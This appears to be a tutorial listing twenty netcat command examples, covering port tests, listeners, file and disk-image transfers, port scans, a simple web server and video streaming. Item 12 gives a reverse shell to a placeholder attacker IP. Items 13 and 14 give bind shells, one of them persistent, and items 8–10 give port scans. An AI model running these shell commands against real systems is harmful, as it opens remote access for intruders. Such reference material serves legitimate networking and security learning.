Netcat (nc) is a versatile networking utility for reading from and writing to network connections using TCP or UDP. Below are some practical examples showcasing its capabilities.
1. Test if a Remote TCP Port is Open
To check if a specific TCP port on a remote server is open:
nc 10.0.0.10 80
Use -u for UDP:
nc -u 10.0.0.10 80
2. Set Up a TCP Server Listening on Port 1234
To set up a simple TCP server that listens on port 1234:
nc -l 1234
For a UDP server:
nc -u -l 1234
3. Keep Netcat Listener Alive After the Current Connection Dies
To ensure the listener remains active even after the current connection closes:
nc -k -l 1234
4. Transfer File to Remote Endpoint
To transfer a file to a remote endpoint:
nc 10.0.0.10 1234 < my.tgz
Alternatively:
cat my.tgz | nc 10.0.0.10 1234
5. Receive and Save File via Netcat
To receive a file and save it:
nc -l 1234 > my.tgz
6. Create a Tarball and Pipe it to Netcat
To create a tarball of the current directory and send it via netcat:
tar -cf - . | nc -v 10.0.0.10 1234
7. Receive a Tarball and Extract it
To receive a tarball and extract its contents:
nc -lv 1234 | tar -xfv -
8. Scan a Range of Ports on a Target
To scan ports 1-1000 on a target host:
nc -z 10.0.0.10 1-1000
9. Scan Multiple Ranges of Ports
To scan multiple ranges of ports:
nc -z 10.0.0.10 1-100 200-300
10. Scan UDP Ports with 1-Second Timeout
To scan UDP ports with a 1-second timeout:
nc -vuz -w1 10.0.0.10 1-1000
11. Send an HTTP Request
To send a simple HTTP request:
printf "GET / HTTP/1.0\r\n\r\n" | nc google.com 80
12. Create a Reverse Shell on Target Host
To create a reverse shell connecting to the attacker’s IP:
nc <attacker-ip> 4444 -e /bin/bash
13. Create a Bind Shell on Target Host
To create a bind shell on the target host:
nc -l 4444 -e /bin/bash
14. Create a Persistent Netcat Listener for Bind Shell
To create a persistent listener for a bind shell:
nc -k -l 4444 -e /bin/bash
15. Run a Command and Redirect Output to Client
To run a command and send the output to the client:
nc -l 12345 -c 'uptime'
16. Transfer a Gzipped Hard Drive Out
To transfer a gzipped hard drive image:
dd if=/dev/sdb | gzip -c | nc 10.0.0.10 1234
17. Save Transferred Hard Drive Image
To save a transferred hard drive image:
nc -l 1234 | sudo dd of=/backup/sdb.img.gz
18. Serve a Static Web Page
To serve a static web page using netcat:
while true; do nc -l 8000 < test.html; done
19. Start Streaming Video Upon Client Connection
To start streaming a video file upon client connection:
mkdir /tmp/pipe; cat video.mp4 > /tmp/pipe & nc -ul 12345 < /tmp/pipe
20. Receive and Play Video Stream with MPlayer
To receive a video stream and play it using mplayer:
nc -u 10.0.0.10 12345 | mplayer -
Conclusion
Netcat is an incredibly powerful tool for network troubleshooting, file transfers, and even creating simple servers. Use these commands responsibly and ensure you have permission to interact with the systems involved.
Happy networking!